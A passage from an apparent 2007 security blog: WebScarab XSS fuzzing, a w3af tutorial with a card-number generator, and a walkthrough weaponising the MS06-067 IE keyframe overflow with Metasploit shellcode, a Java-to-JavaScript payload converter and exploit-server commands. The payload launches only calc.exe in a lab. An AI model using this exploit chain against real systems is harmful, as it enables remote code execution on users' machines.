// convert it to string

// Test the Response to see if  our string is echoed back
String xss;

while ((xss = xssStrings.readLine()) != null) {

if ( raw.indexOf(xss) !=  -1 && xss != "") {

bfOut.write(raw);

bfOut.close();

//JOptionPane.showMessageDialog(null, "Possible XSS Found");

}



}

Now let me explain. This script is run after the response is received from the server. I have a file called xss.txt that contains xss exploits that I also use as the input source for the Fuzzer plugin (i'll explain more later) but I also use it in this script to search for the strings in the server response. If the string is found in the response there is a fairly good chance the exploit was successful.
When one of the xss string is found I write an html file that is a screen scape of the response and the file name looks like “ss-20071201-041504.html”. Which is ss + the date and time down to the second.

To use this script you need to load it to the webscarab framework via Tools->Script Manager at the top of the WebScarab application.
Then there is a tree view that displays Framework->AddConversation.
Click Add at the top.
Now every time a conversation is added to the Summary of WebScarab this script will run as long as the checkbox is selected next to the script in the Script Manager.

Using the Fuzzer
Once you have the above script loaded in the Script Manager go to the Summary tab and find a conversation that you want to fuzz. You can look at the parameters column to find a fuzzable request. Now right click and select Use as fuzz template. Select the Fuzzer tab now and you will see your request added here with all the parameters broken out.
Click Source in the middle of the Fuzzer plugin and add the same xss.txt file that you have listed in the above script. Once this is done you can use this file to fuzz the parameters in the fuzz template.
Select the fuxx source for each parameter from a drop down box.

Now click start. If any of your fuzzing executed an XSS you will see files appearing in your folder you assigned in the Script Manager.

As you can see this can be used for several different things. You could have sql injection strings listed in the fuzzer sources and then have partial sql error messages be in the file you use as input to the script you added to the Script Manager. Once you know your way around WebScarab and which hooks are available you are only limited by your imagination.

More on Webscarab and Scripting.
In the script manager you will see descriptions of the hooks available to you. I just explained the conversation options but there are Proxy options as well. You can have special scripts run on both the request and response for the proxy. I used the conversation because I could not query the responses from the fuzzer plugin via the proxy scripts. Some ideas I have thought about implementing are alerts that pop up when patterns in the responses like hidden error messages, ip address strings, etc. are found.

Slashdot It!

W3AF Tutorial (Part 2)

2007-10-19T16:25:00.000-05:00

Overview
From the previous article we started a basic audit with w3af. This article we are going to discuss writing scripts to start an audit and then we will discuss some of the cool tools included in w3af. The next article will hopefully be about writing plugins. So stay tuned for that. There has been a new versions released on Oct 18th. This article deals with the previous version but none of the topics I have discussed have changed.

Writing StartUp scripts
If you have an audit configuration that you use over an over then scripts are a necessity. It is pain to have to set the same options for your output, auditing and discovery features if you use the same things all the time and only change the target. We will start with a script that you can configure to meet your needs.

Create a file named anything. I will call mine basic.w3af. you write the script the same way that you would actually navigate through w3af to set the settings. So the script below will set all out audit, discovery, and output plugins so that these do not need to be set up after we start w3af.

# Basic startup script
plugins
output console,htmlFile
output
output config htmlFile
set verbosity 10
back
output config console
set verbosity 5
back

# could change this to audit all but just doing Cross Site Scripting Now
audit xss
audit

discovery webSpider,pykto,hmap,allowedMethods
discovery
back

target
set target http://localhost:8081
back

You can also add start to the end of this file and it will automatically start profiling the target when run. To run just type:
>./w3af –s basic.w3af

Looks like this:

$ ./w3af -s basic.w3af
w3af>>> plugins
w3af/plugins>>> output console,htmlFile
w3af/plugins>>> output
Enabled output plugins:
htmlFile
console
w3af/plugins>>> output config htmlFile
w3af/plugin/htmlFile>>> set verbosity 10
w3af/plugin/htmlFile>>> back
w3af/plugins>>> output config console
w3af/plugin/console>>> set verbosity 5
w3af/plugin/console>>> back
w3af/plugins>>> audit xss
w3af/plugins>>> audit
Enabled audit plugins:
xss
w3af/plugins>>> discovery webSpider,pykto,hmap,allowedMethods
w3af/plugins>>> discovery
Enabled discovery plugins:
allowedMethods
webSpider
hmap
pykto
w3af/plugins>>> back
w3af>>> target
w3af/target>>> set target http://localhost:8081
w3af/target>>> back
w3af>>>

Now just type start and your audit will begin.

Tools included in w3af
There are a few really cool tools in w3af. Move to the tools folder and list them.


w3af/tools>>> list
base64decode
base64encode
gencc
md5hash
sha1hash
urldecode
urlencode
w3af/tools>>>

With W3AF you can Generate Credit Card numbers and hashes. Open w3af and navigate to the tools folder. The gencc command can generate credit card numbers to test applications or what ever you want. It will generate the following card numbers
- mastercard
- visa16
- visa13
- amex
- discover
- diners
- enRoute
- jcb15
- jcb16
- voyager

Run the following commands to create a 16 digit visa CC#.


w3af/tools>>> run gencc -t visa16
Generated VISA 16 digit card:
4916740510259019
w3af/tools>>>

Create a sha1 hashes as follows:


w3af/tools>>> run sha1hash -e 49167405102590194916740510259019
4b52f4ce218c72a18e644f40550b2966767137c9
w3af/tools>>>

It also has feature to perform urlencoding and decoding which can come in handy when testing or auditing an application. These commands are simple enough…


w3af/tools>>> run urlencode
w3af - urlencoder

Options:
        -h      Print this help message.
        -s      Characters that should not be encoded, default is / .
        -e      String to be encoded.

Example: urlencode -s &% -e encodeMeNow


w3af/tools>>> run urldecode
w3af - urldecoder

Options:
   -h      Print this help message.
   -d      String to be decoded.

Example: urldecode -d decodeMeNow
w3af/tools>>>

That’s all I have so far. Currently working on w3af plugins and should have something ready soon to show. Please add any comments if you may have something to contribute or find any inaccuracies.

Slashdot It!

HeapLib and Shellcode

2007-10-16T01:51:00.000-05:00

Overview
This will be a quick article about using metasploit to generate shellcode. The shell code I will generate will be specific to using HeapLib and the keyframe buffer overflow exploit demonstrated by Alexander Sotirov. You can find out more about Alexander Sotirov's work here and download the source code from the blackhat.com archives here. I will use his source code and add my generated shellcode so that we can execute any command on the windows system when ever a user navigates to the webpage.

First off any user attempting to exploit this should know a few things. This exploit has been fixed in the most recent versions of IE and does not work in any other browser than an un-patched IE browser. I use a virtual machine to run all my expliots.
Generating Shellcode + NOP Slide
To execute this vulnerability we need a nop sled + shellcode of 870 bytes. This is the limit used by HeapLib. Start Metasploit and execute the following commands.


msf > use windows/exec
msf > use windows/exec
msf payload(exec) > show options


Module options:


   Name      Current Setting  Required  Description                           
   ----      ---------------  --------  -----------                           
   CMD                        yes       The command string to execute         
   EXITFUNC  seh              yes       Exit technique: seh, thread, process  


msf payload(exec) > 
msf payload(exec) > set CMD calc.exe
CMD => calc.exe
msf payload(exec) > set EXITFUNC process
EXITFUNC => process
msf payload(exec) > show options


Module options:


   Name      Current Setting  Required  Description                           
   ----      ---------------  --------  -----------                           
   CMD       calc.exe         yes       The command string to execute         
   EXITFUNC  process          yes       Exit technique: seh, thread, process

Calculate the Length of the NOP Slide
To figure out how the length of your NOP slide we will subtract 870 – the length of shellcode.
If your just type generate you will be displayed with the length in bytes of the shellcode.


msf payload(exec) > generate
# windows/exec - 121 bytes
# http://www.metasploit.com
# EXITFUNC=process, CMD=calc.exe
"\xfc\xe8\x44\x00\x00\x00\x8b\x45\x3c\x8b\x7c\x05\x78\x01" +
"\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49\x8b\x34\x8b\x01" +
"\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2" +
"\xeb\xf4\x3b\x54\x24\x04\x75\xe5\x8b\x5f\x24\x01\xeb\x66" +
"\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x8b\x1c\x8b\x01\xeb\x89" +
"\x5c\x24\x04\xc3\x5f\x31\xf6\x60\x56\x64\x8b\x46\x30\x8b" +
"\x40\x0c\x8b\x70\x1c\xad\x8b\x68\x08\x89\xf8\x83\xc0\x6a" +
"\x50\x68\x7e\xd8\xe2\x73\x68\x98\xfe\x8a\x0e\x57\xff\xe7" +
"\x63\x61\x6c\x63\x2e\x65\x78\x65\x00"
msf payload(exec) >

So we need a NOP slide of 870 – 121 = 749. The -s option allows us to set a value for a NOP slide to occur before the shellcode and we also need out shellcode to be in javascript. I know that metasploit generates shellcode in java script but there isn't an option that i know of to generate it on the fly. So i wrote a simple java program to to create the javascript from the Java Shellcode. Below is the javascript, anyone attempting my to run this just needs to copy it into a file named toJS.java, change the shell array to your shellcode, and run it. Its really simple to do.

Generate the PayLoad


msf payload(exec) > generate -s 749 -t java
/*
 * windows/exec - 870 bytes
 * http://www.metasploit.com
 * NOP gen: x86/opty2
 * EXITFUNC=process, CMD=calc.exe
 */
byte shell[] = new byte[]
{
        (byte) 0x7b, (byte) 0x78, (byte) 0x71, (byte) 0x1c, (byte) 0x4b, (byte) 0x66, (byte) 0x42, (byte) 0x86,
        (byte) 0xf9, (byte) 0x77, (byte) 0x04, (byte) 0x97, (byte) 0x49, (byte) 0xb2, (byte) 0x91, (byte) 0x0b,
        (byte) 0xd5, (byte) 0x72, (byte) 0x7f, (byte) 0x71, (byte) 0x35, (byte) 0x99, (byte) 0xb4, (byte) 0x7d,
...
...
...
      0x8b,
        (byte) 0x68, (byte) 0x08, (byte) 0x89, (byte) 0xf8, (byte) 0x83, (byte) 0xc0, (byte) 0x6a, (byte) 0x50,
        (byte) 0x68, (byte) 0x7e, (byte) 0xd8, (byte) 0xe2, (byte) 0x73, (byte) 0x68, (byte) 0x98, (byte) 0xfe,
        (byte) 0x8a, (byte) 0x0e, (byte) 0x57, (byte) 0xff, (byte) 0xe7, (byte) 0x63, (byte) 0x61, (byte) 0x6c,
        (byte) 0x63, (byte) 0x2e, (byte) 0x65, (byte) 0x78, (byte) 0x65, (byte) 0x00
};
msf payload(exec) >

Convert Java to JavaScript

Copy and paste the generated shellcode into my java app. The code is listed below.


public class toJS {



 
 static int LENGTH=870;

 static byte shell[] = new byte[]

                         {

                                // your shell code goes here 

                         };

 public static void main(String[] args) {

  String shell2 = "";

  for (int i=0; i< LENGTH; i=i+2)

  {

   int b1 =((byte) shell[i+1] << 8) & 0x0000ff00;

   b1 =  b1 | ((byte) shell[i] & 0x000000ff);

   String word  = Integer.toHexString(b1);

   if(word.length()==0)

     word = "0000";

   else if (word.length() ==1)

     word = "000" + word;

   else if( word.length() ==2 )

    word = "00" + word;

   else if( word.length() ==3 )

    word = "0" + word;

   

   shell2 += "%u" + word;

  }

  System.out.println(shell2);

 }



}

Run the following commands and your output should look like the following:

ascetik@ascetik:~$ javac toJS.java
ascetik@ascetik:~$ java toJS
%ub49f%u91be%u1c35%ud62a%u7d73%u853c%u4ed5%u98b2%u4337%ub549%u7290%u2c04%u0171%u21e3%u28e1%ubbf5%u4905%u8915%u27e0%ub71d%ub497%u3593%ud187%u78eb%ub61c%u19b9%u7df9%u2a3c%u4afc%u6624%ue286%ud56b%ua82f%ube14%u3899%u42d4%u98b2%u7e46%ub03d%u7fb5%u2d70%u9625%u9240%u7441%u760d%u777c%u4e7b%uf811%u679f%u7a47%u1a75%u4ffd%u4334%u0cb3%ud684%u91b1%u4b79%ua937%u48b8%u9bbf%uba3f%u7573%ue300%uba3c%u3fb2%ub3b4%u0276%ub8f5%u3198%u27eb%u71a8%ufe01%uf9c1%u7a73%u9005%u6779%u2d7c%ua92c%u701c%u804e%u29e2%u49e0%u744f%u7d46%u043d%u0c9f%ub6b1%u3796%ud303%uc0ff%ubbd5%u15b5%u4a4b%u1d99%ufc0b%u3a25%u47f8%u0db9%ub741%u7b92%u4824%u2fbf%u3491%ud032%u97fd%u4293%u7ebe%u6677%u7fb0%u7278%u9b35%ue109%u1440%u8143%u7fd6%ue339%u2075%ue0f6%ud428%u7398%u7a04%u1d14%u70be%u477e%u7d7b%u4649%u4fb2%u789f%u742c%u4b05%u850c%ua8fc%u48b8%u3477%ub93c%ub137%u2767%u9015%u4a40%u9296%ue212%ue118%uf80a%u1b41%ud6f7%ua9b4%u2472%u23bb%u9bf9%ufd33%u2d2f%ub33f%u2297%u25eb%uba0d%u7176%u1c79%ub5b0%ub699%u8843%u4ef5%u7c42%ud513%ud43b%ub793%ubf3d%u0891%u35e2%ue383%u7770%u6679%ub891%u2b7a%u4bfc%u7e90%u7376%u787d%u9340%u2714%u1d71%u437c%u309b%u4ee0%u75a9%u0c24%u98b9%ud210%ubff8%u29b7%u37e1%u3c74%u923f%ubb1c%u97b4%u4241%ud469%u2846%ub6d5%u2d2c%u359f%u25be%u4f7f%u3134%u67f9%u9947%u2a96%u04f5%u0549%u7248%uba3d%u4ab2%ub366%ub1b5%u157b%ueb01%ufd0b%ud63b%u2fb0%ua80d%u7a24%ue021%u1970%ud4c0%u8334%u79e1%u6778%u25ba%u2c72%u9f47%u0d97%u4b14%u094f%u46e3%u1d92%uf633%u7ceb%u3566%u9640%u81bf%u2fe2%u3f9b%u157d%ub5a9%u05be%u717b%ua841%ubb27%u3c99%u137f%u1cfc%u7690%u0c74%u8949%u73d6%ub32d%uf90a%u3998%u4ed5%u43b7%u93b2%ub9b1%ufd6b%u4a42%u77b4%ub037%uf887%u3d48%u75b6%u047e%uf585%ub891%u7770%u747b%ufc38%ue186%u4073%u3a7f%u76eb%u7c35%u6671%u88b4%u7de2%ue030%u4b3f%ub22f%ub067%ub846%u0447%u2bb6%ud5d2%u9798%u272d%ub943%ud41b%u18b5%u99f8%u4896%u2c7a%u37be%ufd10%ud020%ue3d1%u914e%u750c%u4178%ud311%u3df9%u1dbb%u797e%u2305%ua8f5%u9b93%u4f92%u729f%u3242%u12e2%u7fd6%u0d72%u90bf%u087c%u15e3%ub3b7%ubab1%u497b%u4a79%u0074%u25e0%u347a%u1470%u1c73%u3c7e%u84a9%uf7c1%u24eb%u4776%u7da8%uf802%u1a71%u24e1%u98be%u9049%u779f%u2d05%u0db6%u0399%ub3f5%u3c4b%u804e%u48d5%ubf67%u43bb%ub89b%ub23f%u7542%u3d1c%u344f%u2537%u78d4%u6904%ub1f9%u462f%u9266%u41b4%u4a93%u22ba%u96fc%u1db7%u27d6%ub90c%u15a9%ub597%u3540%ub02c%u9114%ufcfd%u44e8%u0000%u8b00%u3c45%u7c8b%u7805%uef01%u4f8b%u8b18%u205f%ueb01%u8b49%u8b34%uee01%uc031%uac99%uc084%u0774%ucac1%u010d%uebc2%u3bf4%u2454%u7504%u8be5%u245f%ueb01%u8b66%u4b0c%u5f8b%u011c%u8beb%u8b1c%ueb01%u5c89%u0424%u5fc3%uf631%u5660%u8b64%u3046%u408b%u8b0c%u1c70%u8bad%u0868%uf889%uc083%u506a%uf068%u048a%u685f%ufe98%u0e8a%uff57%u63e7%u6c61%u2e63%u7865%u0065
ascetik@ascetik:~$

Putting It All Together
Open the file ms06-067-keyframe.html in the downloaded source code from the BlackHat Site and replace his shell code with your genereted shellcode. Look for var shellcode. Load it to your server and run and run your unpatched Windows XP IE browser at it and watch your calulator pop up on the screen. YAY your done!

Or Just Use Metasploit for Everything
You can also use metaploit to automate every thing and let metasploit be your web server too just by doing the following commands:


msf > use windows/browser/ms06_067_keyframe
msf exploit(ms06_067_keyframe) > set URIPATH exploitme
URIPATH => exploitme
msf exploit(ms06_067_keyframe) > set TARGET 0
TARGET => 0
msf exploit(ms06_067_keyframe) > set PAYLOAD windows/exec
PAYLOAD => windows/exec
msf exploit(ms06_067_keyframe) > set CMD calc.exe
CMD => calc.exe
msf exploit(ms06_067_keyframe) >

Now to run the exploit.


msf exploit(ms06_067_keyframe) > exploit
[*] Using URL: http://192.168.1.101:8080/exploitme
[*] Server started.
[*] Exploit running as background job.
msf exploit(ms06_067_keyframe) >

Point your browser to http://192.168.1.101:8080/exploitme and the calculator will run from the browser.

Slashdot It!